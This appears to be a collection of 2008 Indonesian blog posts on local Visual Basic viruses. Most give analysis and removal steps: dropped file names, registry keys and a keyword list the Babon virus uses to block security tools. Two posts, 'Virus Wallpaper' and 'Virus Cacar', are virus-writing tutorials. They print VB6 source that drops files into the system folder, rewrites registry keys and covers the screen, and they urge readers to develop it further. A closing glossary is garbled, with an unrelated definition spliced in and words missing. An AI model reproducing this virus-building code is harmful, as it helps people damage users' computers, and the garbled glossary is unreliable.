- Pendekar Blank, 34 KB, menyembunyikan folder C:\Windows\System32 dan membuat file duplikat sesuai dengan nama folder yang disembunyikan [system32.exe], membackup MSVBVM60.dll di C:\WINDOWS\system32\dllChache, manipulasi file .com dan .txt sehingga setiap kali dijalankan akan menjalankan virus.

- Pacaran, 59 KB, mengubah ikon file "non virus" (MP3, txt, reg file, jpeg, inf dan exe) di komputer korban menjadi folder dan tipe file application sehingga pengguna komputer mengira itu adalah virus dan menghapusnya. Aksi lainnya virus ini memanipulasi Host file, menyembunyikan drive dan folder, mengubah tipe file "File Folder", MP3, JPEG menjadi W32.Pacaran.

- Blue Fantasy, 40 KB, otomatis menginfeksi dari Flash Disk, menyembunyikan folder dan menggantikan dengan file virus duplikat dengan ikon folder.

Lebih lanjut Alfons mengungkap, virus-virus yang dibuat dengan bahasa pemrograman Visual Basic memiliki beberapa ciri khas dan kelemahan sehingga "relatif" lebih mudah dibasmi. Pembasmian akan lebih mudah jika kita mampu mengakses file utama yang diperlukan untuk menjalankan Visual Basic, yaitu MSVBVM60.DLL.

Tetapi keterbatasan ini tidak menjadikan virus lokal yang dibuat kehilangan "kesaktiannya", karena beberapa pembuat virus menyadari kelemahan bahasa Visual Basic ini.

Pembuat virus berusaha menutupi kelemahan yang ada dengan melakukan backup file MSVBVM60.DLL pada direktori lain, dan akan melakukan loading secara otomatis jika MSVBVM60.DLL dihapus.

Para programmer yang menguasai bahasa pemrograman lain menggunakan kelemahan ini untuk menyerang virus-virus yang dibuat dengan Visual Basic, yaitu dengan menghapus file MSVBVM60.DLL dalam aksinya dan menulis virusnya dalam bahasa seperti C++.

Virus .scr, 32 kb, proses: emangeloh.exe

2008-07-01T16:29:00.000-07:00

barusan komputer kantor tetangga kena virus beginian, nih
g kasih tau caranya...(ini virus varian dari yang 42 kb)

1. untuk ngilangin proses virus:
a. download process explorer (www.sysinternals.com)
b. boot ke safe mode
c. jalanin process explorer
d. hapus proses yg namanya "emangeloh.exe"
tips: kalo emangeloh.exe dihapus, bakalan muncul2 lagi
jadi, hapus proses diatas emangeloh.exe. kalo di
komputer g ky gini:
-services
-winlogon
-emangeloh.exe
g hapus proses services (ini bukan proses windows,
tapi ditiru sama virus varian ini, winlogon juga)
oya, cara hapusnya: klik kanan di proses services,
klik di end process tree
e. hapus semua file .scr dan .exe yang besarnya 32 kb
(di komputer g, nama filenya biasanya:
lagu ungu .exe atau
lagu ungu .scr
kalo folder lu diset single click, filenya keliatan
aneh, seperti:
lagu_ungu__________________________.exe
hapus aja

2. untuk ngembaliin regedit:
a. rename regedit.exe jadi reg.exe
b. jalankan reg.exe (akan kebuka regedit)
c. hapus key ini:
hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe

selesai... :)

untuk antivirus...g gak suka sama yang
namanya antivirus....g sendiri pake linux...tapi untuk
temen2 g, g saranin kaspersky...

antivirus antivir bagus, tapi terlalu lambat...bikin
komputer serasa hang...

Virus w32.babon@m3nt0z pemakan file .exe

2008-07-01T16:24:00.000-07:00

Semakin…semakin aja virus virus bermunculan di cyber indonesia…walopun kecil2 tapi agak menjengkelkan jugak yah…kali ini buatan anak sampit, yaitu virus babon … kok babon???iya lah…namanya virus ya bebaslah…mau babon, babin, nyemot…. Yang penting bisa menghajar komputer …. Nah coba lihat ciri2 yang terkena virus ini …

Code name: w32.babon@m3nt0z
CRC32 : banyak sekali ... kayaknya emang udah berkembang ni virus
Ukuran : 91,4 kb atau 92 kb

Pertama kali ngeliat file bernama cewek_imoet pasti jantung anda berdegup kencang (DUG DUG DUG DUG)...emang bunyi bedug..!!!!! lalu anda mempunyai hasrat untuk membuka file tersebut.....huihihihihi!!!STOP STOP...(sambil mencegah pembaca untk mengklik 2 kali mouse-nya) …lihat dulu men… ekstensinya apa…kalau 3gp, avi atau jpg boleh lah dibukak…tapi kalo exe…ntar dulu…nah ini yang biasanya kurang diperhatikan oleh user – user…hati2 nama file boleh menarik tapi ekstensi file (nama belakang file seperti .com, .exe, .bat, .dll) bisa – bisa menjebak…jadi waspadalah – waspadalah!!!!, karena file cewek_imoet adalah file pemicu virus w32.babon@m3nt0z.

Ciri2 yang telah terkena virus ini:
1. Menu shutdown hilang
2. Registry di blok
3. Folder Options di windows explorer menghilang
4. msconfig diblok
5. File word berekstensi .doc yang asli disembunyikan dan dirubah menjadi file berekstensi .exe mempunyai icon folder berwarna kuning dan berukuran 91,4 kb
6. Seluruh file .exe disembunyikan atau bahkan dihapus dan diganti dengan file virus berekstensi .exe dan mempunyai icon berwarna kuning berukuran 91, 4 kb (ngeri’nyakkkkk!!!!!)
7. My computer menjadi Babon
8. Recycle Bin menjadi Babon suka kebersihan
9. Menu run, search, documents dan lain lain hilang
10. My Documents anda menjadi File_Rahasia THE HUNTER

FILE PEMICU VIRUS
- Cewek_Imoet.exe, mempunyai icon folder berwarna kuning yang ada di tiap drive C:, D:, E: dan lain – lain
- File_Rahasia THE HUNTER.exe , mempunyai icon folder berwarna kuning yang ada di tiap drive C:, D:, E: dan lain – lain
- File IExplorer.exe yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden
- File shell.exe yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden
- Babon.scr yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden dan di tiap drive
- Csrss.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- smss.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- lsass.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- Empty.pif di direktori Documents and Settings\All User\Start Menu\Programs\Startup
- Winlogon.exe di direktori Application Data\Windows\

Virus juga membuat file yang sama dengan nama diatas, Cuma bedanya sebelum extensi file diberi spasi, misal nama file cewek_imoet.exe, virus juga akan membuat file cewek_imoet[spasi].exe jadi nama file aslinya cewek_imoet .exe, gunanya adalah untuk mengacaukan perintah penghapusan di DOS (Diskette Operating System), karena dengan adanya spasi tersebut, file dianggap sebuah parameter, bukan sebuah file.

FILE YANG DIINFEKSI
Virus mencari dan menginfeksi file dengan ekstensi seperti di bawah ini, untuk itu BACKUPLAH HARDISK ANDA:
MP3
MP4
MPG
MPEG
AVI
DAT
WMV
JPG
GIF
JPEG
PNG
ASX
DOC
XLS
WMA
MDB
Dan ekstensi EXE tentunya....

BLOCKING PROGRAM
Virus juga memblocking program yang mempunyai caption sbb:
"TASK"
"REG"
"ASM"
"DBG"
"W32"
"BUG"
"HEX"
"DETEC"
"PROC"
"WALK"
"FUC"
"SEX"
"REST"
"AVAS"
"OPTIONS"
"FORMAT"
"RebarWindow32"
"ComboBoxEx32"
"ComboBox"
"Edit"
"ANTI"
"VIRUS"

PESAN – PESAN YANG DIMUNCULKAN
- Pesan yang dimunculkan dapat dilihat di file wangsit.txt yang ada di tiap drive

Babon
Wahai kalian teman2 ku dimanapun berada.. hehehe
Lagi beapa nih wal? ngenet kah? chatting ? Kuliah yang bujur lah...
Jangan terlalu banyak bejalanan n menghabiskan waktu pakai hal2 yang kda penting
Beuh..pina musti nda ni lah. Hahaha..:)
Just wanna say : Hello Friend.. Moci-moci ^^
Sampit Community..
Peace Man..
By : Anak Sampit yang lagi menuntut ilmu di pulau seberang

Beh beh beh kadak ngarti ikam, ini banjarsari ato Banjarmasin gituh…hahahahahah!
- Pesan virus juga muncul pada saat windows pertama kali login
Welcome to Babon Computer
Please enjoy the babon entertaintment

MANIPULASI REGISTRI

W32.babon memanipulasi beberapa registry yang ada di windows, yaitu:

HKEY_LOCAL_MACHINE, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKEY_LOCAL_MACHINE, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKEY_LOCAL_MACHINE, SOFTWARE\Classes\exefile, Default,0, “application”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, type,0, “Checkbox”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, type,0, “Checkbox”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden, type,0, “group”
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run,MsPatch
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Mspatch
HKEY_LOCAL_MACHINE, SOFTWARE\Classes\exefile, NeverShowExt
HKEY_CURRENT_USER, Software\Policies\Microsoft\Windows\System, DisableCMD

Hati - hati virus ini juga melakukan manipulasi terhadap userinit.exe yang dilakukan oleh virus flu burung dengan jurus terkenalnya tendang login beibeh.
Manipulasi lainnya dilakukan di registry dengan alamat:
CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\ yang berguna untuk merubah Computer name menjadi Komputer babon Nih
CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ yang berguna untuk merubah Recycle Bin menjadi Babon Suka Kebersihan
Virus ini juga menggunakan perintah dari modul shell32.dll yang berguna untuk menjalankan beberapa perintah di windows secara otomatis.

BACKUP VIRUS
Virusnya karena dibuat pakek vb jadi dia menggandakan file msvbvm60.dll ke drive yang ada di komputer di direktori c:\windows dan di c:\windows\system32

PENANGGULANGAN

Pemulihannya emang laen dari yang laen, untuk mematikan prosesnya aja syusyah banget... kita seperti berkejar – kejaran dengan mereka...hmm... mungkin tugas para virologers untuk membuat blocking proses untuk virus w32.babon ini...okay...tapi untuk menendang proses ini anda dapat mendonlot program virus acepmp, viremover yang ada di alamat ini:

Donlot acep.scr dan autorun.inf (acep.zip) untuk tendang process
1. Donlot file acep.scr dan autorun.inf di www.virologi.info
Donlot acep.scr dan autorun.inf (acep.zip) untuk tendang process
2. Kemudian copy file tersebut ke flashdisk anda, taruh di root direktori di flashdisk atau diluar direktorinya
3. Kemudian sambungkan flashdisk ke cpu anda
4. Jalankan file acep.scr, jalankan 2, 3 atau 4 kali untuk membunuh proses virus
5. Hapus file yang ada di daftar berikut:
- Cewek_Imoet.exe, mempunyai icon folder berwarna kuning yang ada di tiap drive C:, D:, E: dan lain – lain
- File_Rahasia THE HUNTER.exe , mempunyai icon folder berwarna kuning yang ada di tiap drive C:, D:, E: dan lain – lain
- File IExplorer.exe yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden
- File shell.exe yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden
- Babon.scr yang ada di C:\Windows\System32 dan disembunyikan dengan cara men-set attribut file menjadi hidden dan di tiap drive
- Csrss.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- smss.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- lsass.exe yang ada di folder C:\Documents And Settings\User\Local Settings\Application Data\Windows
- Empty.pif di direktori Documents and Settings\All User\Start Menu\Programs\Startup
- Winlogon.exe di direktori Application Data\Windows\

6. Hapus alamat registry ayng dimanipulas virus yang ada di:
HKEY_LOCAL_MACHINE, Software\CLASSES\batfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\comfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\exefile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\piffile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, Software\CLASSES\regfile\shell\open\command,,,"regedit.exe "%1""
HKEY_LOCAL_MACHINE, Software\CLASSES\scrfile\shell\open\command,,,"""%1"" %*"
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Shell,0, "Explorer.exe"
HKEY_LOCAL_MACHINE, SOFTWARE\Classes\exefile, Default,0, “application”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\HideFileExt, type,0, “Checkbox”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden, type,0, “Checkbox”
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden, type,0, “group”
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegistryTools
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\System,DisableTaskMgr
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,NoFolderOptions
HKEY_CURRENT_USER, Software\Microsoft\Windows\CurrentVersion\Run,MsPatch
HKEY_LOCAL_MACHINE, SOFTWARE\Microsoft\Windows\CurrentVersion\Run,Mspatch
HKEY_LOCAL_MACHINE, SOFTWARE\Classes\exefile, NeverShowExt
HKEY_CURRENT_USER, Software\Policies\Microsoft\Windows\System, DisableCMD

7. Cari file .exe dengan ukuran 91,4 kb dengan folder icon warna kuning, kemudian hapus
8. Scan hardisk anda dengan WAV 2005 update-an terbaru

Jika belum bisa jugak pakai cara pamungkas untuk membunuh virus:
1. Booting dengan cd win xp
2. Kemudian tekan ‘R’ untuk repair
3. Isi password administrator
4. Pilih drive dimana windows di install, yaitu dengan menekan tombol 1,2 atau 3
5. Ganti file msvbvm60.dll dan msvbvm50.dll dengan nama lain misalnya msvbvxxx.xxx atau nama lain, file tersebut terletak di:
C:\Windows
C:\windows\system32
Atau di root direktori di C:, D:, atau lainnya, maksud root direktori ya diluar direktori gitu...
6. Kemudian booting dan masuk ke windows
7. Otomatis file virus tidak berjalan karena virus harus mengakses file msvbvm60.dll terlabih dahulu sebelum menjalankan kode-kodenya

VIRUS Pemakan File MS Word

2008-07-01T16:19:00.000-07:00

Ternyata gagak tidak hanya sebagai burung pemakan daging, tapi di dunia cyber, gagak atau raven memakan file – file Microsoft word anda, WATCH OUT for this virus…

Code Name : w32.fluburung@raven.com
Nilai crc32 : 92CCA704 dan BDB819EB
Besar File : 104 Kb

Mulai lagi virus yang memakan file .doc atasu dokumen microsoft word anda, untuk itulah pentingnya sistem restore di sini, coba baca lagi artikel di virologi dengan alamat :
http://virologi.info/virologist/modules/news/article.php?storyid=85
Hanya itu cara P3K untuk mengembalikan file – file dokumen microsoft word anda, karena virus ini menyisipkan kode ke dokumen word anda, sehingga dokumen word menjadi rusak. Virus juga mengubah icon microsoft word anda mejadi icon Microsoft Word XP dan mengubah ekstensi file menjadi .scr seperti pada gambar di bawah ini:

Tetapi seperti gambar di atas virus tidak merubah nama dan ukuran file, hebat, kemajuan…kenapa?Karena virus memakai packer dotFix FakeSigner v2.2, yaitu pembungkus virus yang dapat mengelabui Hexeditor, yaitu dengan cara menyembunyikan PE Header File agar pembungkusnya tidak kelihatan. Sebenarnya Pembungkus file yang asli adalah Aspack dan virus tersebut dapat dibukai memakai software Unaspack atau AspackDie. Maka kelihatan ukuran asli file virus adalah 104 Kb.

MELIHAT PESAN VIRUS
Untuk melihat Pesan virus, cukup ikuti langkah berikut:
1. Unpack file virus dengan program pembongkar Aspackdie
2. Maka file yang tadi berukuran sejumlah file doc yang belum terinfeksi menjadi 104 kb. Misalnya file doc-nya sebelumnya berukuran 1,224 Kb, maka sehabis dibongkar pembungkusnya menjadi berukuran 104 kb.
3. Ganti ekstensi file dari .scr menjadi .doc, kemudian buku memakai MS WORD, maka akan terlihat pesan sbb :

======= FLU BURUNG =======

| |

= Oleh-oleh dari AMBON.. =

| Katong pung jua bisa |

==========================

==========================

Bugs Bunny say "What's up doc?"
Duffy Duck say "I'm infected doc"
So at the end of story they save the screen.

PAJAK? Semua hal kena pajak!
Barang mewah kena pajak, nabung di bank tiap bulan potong pajak,
penghasilan kena pajak, sampai makanan pun kena pajak.
Indonesia penuh dengan pajak! Tidak heran penuh pembajak.
Orang bijak bayar pajak, takut pajak jadi pembajak.
Cuma udara yang dihirup yang tidak kena pajak, namun sudah tercemar
dengan asap dan polutan. "Tanya kenapa?"
(Raven codename "05062705056127019455")

MSG (Monosodium Glutamat) merupakan penyebab kebodohan yang berakibat kemalasan.
Pantas bangsa Indonesia tidak bisa maju karena bangsanya bodoh.
Hampir semua produk makanan Indonesia menggunakan MSG.
Pemerintah harus segera menghapuskan penggunaan MSG dipasaran!
Mungkin karena para pejabat dan wakil rakyat otaknya juga sudah penuh dengan MSG,
jadi tidak dapat berpikir dengan benar!
Atau mereka terpilih karena terpintar diantara yang terbodoh,
ataukah memang sengaja membodohkan bangsa agar dapat korupsi dangan leluasa?
(Raven codename "05062705056127019455")

Flu burung, masa sich burungnya bisa flu? Tanya kenapa?
Awas bahaya flu burung, bahaya lo? Bisa RIP tau?
(RIP "Rest in Peace"/Constantine)
Rupiah kebanyakan angka! (Okinawa)
Dimana sebenarnya pemerintah ??????
Pemerintah sekarang ini lebih memilih uang uang dan uang.
Malahan sekarang lebih lebih untuk masalah pilkada pilkada dan pilkada.
Kita sebagai mahasiswa dan masyarakat merasa terasingkan dari perhatian pemerintah.
Tanya kenapa ????
Lihat saja pengangguran banyak sekali!!!
Sebenarnya siapa yang bisa ngomongin dengan pemerintah ?????
Aku????? Ga mungin lagi.
Tapi mudah-mudahan pemerintah sadar sendiri aja yaaa!!!
Slamat Muaaach!!!

Idiiih....!
What ta gud message……

MANIPULASI REGISTRY
Virus ini memanipulasi registri anda pada alamat:

HKLM/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”
HKCU/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”

FILE INDUK VIRUS
Kali ini file induk virus tidak berada di C:\Windows atau di C:\Windows\System32, tapi berada di d:\Recycle Bin dengan nama SVCHOST.EXE dengan icon Folder Berwarna Kuning atau Icon MS Word

KEBIASAAN VIRUS
Pada jam tertentu akan memunculkan pesan seperti pada pesan diatas, atau memunculkan kotak yang berisi ‘Masukkan nama – nama orang sakti:’, jika tidak memasukkan nama – nama orang tersebut maka komputer akan restart atau mengunci system, jika ada pertanyaan seperti itu masukkan saja nama orang2 yang ‘mungkin’ anggota komunitas dari virus ini, yaitu:

SpiderWeb
MoonDance
NigthStalker
Raven

Kemudian ada pertanyaan, lagi pilih makan atau mati…wah wah wah makin kreatip aja ini orang…..

PENANGGULANGAN

1. Donlot showkillprocess.exe dan WAV 2005 yang ada di www.virologi.info/download
2. Matikan proses SVCHOST.EXE yang mempunyai Base Priority dan Point Of Threads 8 dan 1
3. Scan salah satu folder (dengan signatures.db , bisa didonlot di www.virologi.info/download/signatures.db dengan WAV 2005, yang berguna untuk membuka kunci registry dan menampilkan file hidden.
4. Hapus Registry yang ada di alamat berikut:

HKLM/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”

HKCU/Software/Microsoft/Windows/Currentversion/Run, svchost, “d:\Recycle Bin\SVCHOST.exe”

5. hapus File induk virus dengan nama SVCHOST.EXE yang ada di D:\Recycle Bin
6. Cari file dengan ekstensi *.scr dengan icon MS WORD, kemudian hapus file tersebut.

PENANGGULANGAN UNTUK FILE YANG HILANG

Untuk file word yang hilang anda dapat menggunakan SYSTEM RESTORE yang ada di windows, dengan catatan kalian tau tanggal berapa system kalian belum terkena virus, kemudian ikuti cara untuk me-Restore System di artikel:

http://virologi.info/virologist/modules/news/article.php?storyid=85

Virus Wallpaper

2008-07-01T16:10:00.000-07:00

Banyak virus lokal yang membuat kita bertanya. kok virus bisa ngeset wallpaper komputer kita ya? lalu dari mana virus dapet gambar dirinya? misal virus wayang yang menset wallpaper,dan Toolbar dari Windows Explorer korbannya dengan gambar wayang lalu bagaimana gambar tersebut dapat ada di komputer kita? tentusaja virus makernya menyertakan gambar tersebut dalam tubuh virus, lalu mencoba mengeluarkan gambar tersebut ke komputer korban (semacam beranak gambar) menuliskan source yang mengubah registry untuk menset wallpaper dan Toolbar dari Windows Explorer. lalu bagaimana virus tersebut bisa mencopykan gambar ke komputer korban? ini adalah script yang aku otak-atik sendiri...

mula2 aku cari project paint(visualbasic) setelah dianalisis ternyata ada save-nya (wew...satu pintu terbuka) lalu aku berpikir bagaimana project ini bisa mensave sendiri pada saat project ini dijalankan? berarti perintah save harus di ubah ke bagian form_load

coba lagi.. perintah save sudah langsung berjalan..tapi kok aku masih harus menuliskan namaGambar dan menekan tombol save? baru gambar tersimpan.. gimana caranya bisa langsung tanpa menulis namaGambar?

otak-atik sourcenya

'Set The File Name To "" (Blank)--->kosong tanpa nama

.FileName = "C:\WINDOWS\system\OEMLOGO.bmp"--->kita kasi nama,sekaligus pengalamatannya ke C:\WINDOWS\system

lalu save

SavePicture frmDocument.PicBox.Image, .FileName

Private Sub Form_Load()
Save_Gambar '---------->jump to Private Sub Save_Gambar()

lalu bagaimana virus mengubah registry untuk menset wallpaper,Toolbar dari Windows Explorer?

virus maker mengubah bagian

HKCU\Control Panel\Desktop-Wallpaper value data:C:\WINDOWS\system\OEMLOGO.bmp-->alamat peranakan gambarVirus HKCU\Control Panel\Desktop\OriginalWallpaper
HKCU\Control Panel\Desktop\ConvertedWallpaper--->yang pling jelas dlm mense walpaper

HKU\DEFAULT\Control Panel\Desktop\SCRNSAVE.EXE

HKU\DEFAULT\Control Panel\Desktop\Wallpaper

HKCU\Software\Microsoft\Internet Explorer\Toolbar--->toolbar

tentunya juga dibagian form_load/fungsi timer

------------------

' SET BACKGROUND

cek = AmbilString(HKCU, "Control Panel\Desktop", "Wallpaper")
If cek = "" Then

BuatString HKCU, "Control Panel\Desktop", "Wallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKCU, "Control Panel\Desktop", "OriginalWallpaper")

If cek = "" Then

BuatString HKCU, "Control Panel\Desktop", "OriginalWallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKCU, "Control Panel\Desktop", "ConvertedWallpaper")

If cek = "" Then

BuatString HKCU, "Control Panel\Desktop", "ConvertedWallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKU, ".DEFAULT\Control Panel\Desktop", "SCRNSAVE.EXE")

If cek = "" Then

BuatString HKU, ".DEFAULT\Control Panel\Desktop", "SCRNSAVE.EXE", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

cek = AmbilString(HKU, ".DEFAULT\Control Panel\Desktop", "Wallpaper")

If cek = "" Then

BuatString HKU, ".DEFAULT\Control Panel\Desktop", "Wallpaper", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

'==========

'set Toolbar dari Windows Explorer

cek = AmbilString(HKCU, "Software\Microsoft\Internet Explorer", "Toolbar")

If cek = "" Then

BuatString HKCU, "Software\Microsoft\Internet Explorer", "Toolbar", "C:\WINDOWS\system\OEMLOGO.bmp"

End If

sekarang uda ga bertanya2 lagikan kok virus bisa bikin ulah gitu? hanya virus maker yang selalu berpikir diluar batas2nya dan selalu berimajenasi dengan karyanya

untuk download nya disini...

download

download vidio

moga yang dikit ini bisa bermanfaat untuk menambah ilmu..

Virus Cacar di Komputer

2008-07-01T16:07:00.000-07:00

Hmmm………
Masihkah anda ingin membuat virus dengan mengotak-atik tampilan desktop.?
Yah seperti artikel-artikel yang sebelumnya aku ingin membagikan ilmu mengenai script membuat virus dengan tampilan yang membuat desktop menjadi bintik-bintik.

Virus ini aku beri nama virus cacar.. hmm kenapa cacar yah.? Ya karena bintik-bintik yang sangat banyak yang terjadi pada desktop. Masak mau dikasih nama virus jerawat.? Ato malah virus kutil.? Wakakakakakakakak…………………….
Lihat gambar dibawah ini.

http://h1.ripway.com/nonickname/virus-cacar-di-komputer.JPG

Ya sudah tanpa banyak basa-basi mari kita mulai pembuatan virus cacar.
Virus ini masih dibuat dengan menggunakan Visual Basic 6
Terdiri atas :
-form
-timer
-module
Agar lebih mudah akan saya tuliskan scriptnya
Berikut adalah script virus cacar.
==============script pada form dan timer=========================
Private Sub Timer1_Timer()

Call GetCursorPos(m)

If m.x = x And m.y = y Then
sum = sum + 25
Else
x = m.x
y = m.y
End If

If sum = 2000 Then
sum = 0
BitBlt Form1.hDC, 0, 0, Screen.Width / Screen.TwipsPerPixelX, Screen.Height / Screen.TwipsPerPixelY, ha, 0, 0, vbSrcCopy
Call SetWindowPos(Form1.hwnd, HWND_TOPMOST, 0, 0, Screen.Width / Screen.TwipsPerPixelX, Screen.Height / Screen.TwipsPerPixelY, SWP_SHOWWINDOW)
ready = True
End If

End Sub
==========================END SCRIPT==============================
Berikutnya adalah pada bagian module…
Module terdiri atas script seperti berikut.

==========SCRIPT MODULE======================================
Public Declare Function BitBlt Lib "gdi32" (ByVal hDestDC As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hSrcDC As Long, ByVal xSrc As Long, ByVal ySrc As Long, ByVal dwRop As Long) As Long
Public Declare Function GetDC Lib "user32" (ByVal hwnd As Long) As Long
Public Declare Function GetDesktopWindow Lib "user32" () As Long
Public Declare Function GetCursorPos Lib "user32" (lpPoint As POINTAPI) As Long
Public Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByVal lpvParam As Any, ByVal fuWinIni As Long) As Long
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Public Type POINTAPI
x As Long
y As Long
End Type

Public Const HWND_TOPMOST = -1
Public Const SWP_SHOWWINDOW = &H40

Public m As POINTAPI
========================End Script=====================

Bagi seorang VM mungkin script diatas terlalu mudah untuk di rubah-rubah, untuk itu silahkan kembangkan sendiri sesuai dengan kemampuan.
Hmmm… bagi yang ingin mendownload secara lengkap source code diatas dapat di download dengan mudah di bawah ini.

Download source virus cacar secara lengkap

download

Jenis Jenis Virus Komputer

2008-07-01T09:12:00.000-07:00

Virus Resident adalah Program virus yang menetap di memori.

Arti istilah Residental Gateway dianggap berkaitan erat dengan pengertian berikut : CPE (Costumer Premises Equipment) yang menjalankan XGCP dan memiliki koneksi ke suatu jaringan VoIP serta koneksi ke perangkat telephony pengguna.

Virus life circle :
Siklus hidup virus. Virus mengalami siklus hidup empat fase, yaitu:
1. Fase tidur (dormant phase),
2. Fase propaganda (propagation phase),
3. Fase pemicuan (triggering phase),
4. Fase eksekusi (execution phase).

Anti Virus adalah Program untuk melacak keberadaan dan mengamankan virus pada media penyimpanan, baik pada disk maupun memory.

Trojan horse
Rutin tak terdokumentasi rahasia ditempelkan dalam satu program berguna. Program yang berguna mengandung kode tersembunyi yang ketika dijalankan melakukan suatu fungsi yang tak diinginkan. Eksekusi program menyebabkan eksekusi rutin rahasia ini. Program trojan horse digunakan untuk melakukan fungsi-fungsi secara tidak langsung dimana pemakai tak diotorisasi tidak dapat melakukannya secara langsung. Contoh untuk dapat mengakses file-file pemakai lain pada sistem dipakai bersama, pemakai dapat menciptakan program trojan horse. Trojan horse ini ketika program dieksekusi akan mengubah ijin-ijin file sehingga file dapat dibaca oleh sembarang pemakai. Program trojan horse yang sulit dideteksi adalah kompilator yang dimodifikasi sehingga menyisipkan kode tambahan ke program-program tertentu ketika dikompilasi, seperti program login. Kode menciptakan Trapdoor pada program login yang mengijinkan pencipta log ke sistem menggunakan password khusus. Trojan horse ini tak pernah dapat ditemukan jika hanya membaca program sumber. Motifasi dari trojan horse adalah penghancuran data. Program muncul sebagai melakukan fungsi-fungsi berguna, seperti kalkulator, tapi juga secara diam-diam menghapus file-file pemakai. Trojan horse biasa ditempelkan pada program-program atau rutin-rutin yang diambil dari BBS, internet, dan sebagainya.

Worm :
yang dapat mereplikasi dirinya dan mengirim beberapa kopian dari komputer ke komputer lewat hubungan jaringan. Begitu tiba, worm diaktifkan untuk dan kembali. Selain propagasi, worm biasanya melakukan fungsi yang tak diinginkan. Network worm menggunakan hubungan jaringan untuk menyebar dari sitem ke lain. Sekali aktif di suatu sistem, worm dapat berlaku seperti atau , atau menempelkan program atau melakukan sejumlah aksi menjengkelkan atau menghancurkan. Untuk mereplikasi dirinya, network worm menggunakan suatu layanan jaringan, seperti:
- fasilitas ,
- kemampuan eksekusi jarak jauh,
- kemampuan jarak jauh.

Singkatan dari Write Once-Read Many (WORM).

Pengertian Virus

2008-07-01T09:06:00.000-07:00

